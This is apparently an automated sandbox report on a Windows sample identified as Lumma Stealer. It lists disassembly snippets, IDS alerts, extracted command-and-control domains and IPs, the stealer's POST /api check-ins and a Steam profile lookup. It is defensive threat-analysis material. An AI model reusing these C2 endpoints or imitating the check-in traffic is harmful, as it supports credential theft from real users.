                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh0_2_009F99D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h0_2_009F99D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_009F99D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h0_2_009F99D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh0_2_009F99D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h0_2_009F99D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]0_2_00A089C0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]0_2_00A1A9DE
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [eax], cx0_2_009F6907
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov eax, edx0_2_009FC921
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00A0C94B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]0_2_009E9967
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]0_2_009E9967
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]0_2_009E9967
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]0_2_009EEAA2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_009EDA09
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]0_2_009EDA09
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_009EABA7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov edx, ecx0_2_009EABA7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h0_2_00A05BF7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ecx, di0_2_00A05BF7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]0_2_009ECB7E
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov esi, eax0_2_00A03C9B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_009FEC17
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh0_2_00A16C3B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movsx eax, byte ptr [esi]0_2_00A1BC08
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00A09C17
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h0_2_00A1CD87
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_00A1AD19
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ebp, dword ptr [eax]0_2_00A16E67
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]0_2_009EDF8C
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h0_2_00A1CFC7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [ebx], dx0_2_009F8F35
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_009F8F35
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov ecx, eax0_2_00A01F77
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 4x nop then mov word ptr [eax], dx0_2_009F5F79

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.6:55551 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.6:49724 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.6:49724
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:55658 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.6:57676 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.6:55780 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.6:59460 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:63885 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.6:53454 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.6:56812 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.6:49718 -> 178.62.201.34:443
                  Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.6:49718
                  Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.6:58974 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49724 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49724 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49718 -> 178.62.201.34:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49718 -> 178.62.201.34:443
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49740 -> 23.55.153.106:443
                  Source: Malware configuration extractorURLs: deafeninggeh.biz
                  Source: Malware configuration extractorURLs: debonairnukk.xyz
                  Source: Malware configuration extractorURLs: immureprech.biz
                  Source: Malware configuration extractorURLs: sordid-snaked.cyou
                  Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                  Source: Malware configuration extractorURLs: awake-weaves.cyou
                  Source: Malware configuration extractorURLs: effecterectz.xyz
                  Source: Malware configuration extractorURLs: diffuculttan.xyz
                  Source: DNS query: effecterectz.xyz
                  Source: DNS query: diffuculttan.xyz
                  Source: DNS query: debonairnukk.xyz
                  Source: Joe Sandbox ViewIP Address: 45.77.249.79 45.77.249.79
                  Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 45.77.249.79:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49740 -> 23.55.153.106:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 178.62.201.34:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308517808.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowere equals www.youtube.com (Youtube)
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: d.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: d.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=3ea3f124c1b5621fba051c57; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 17 Dec 2024 15:42:15 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308517808.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowere equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                  Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                  Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                  Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                  Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                  Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                  Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                  Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/apius
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375237608.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
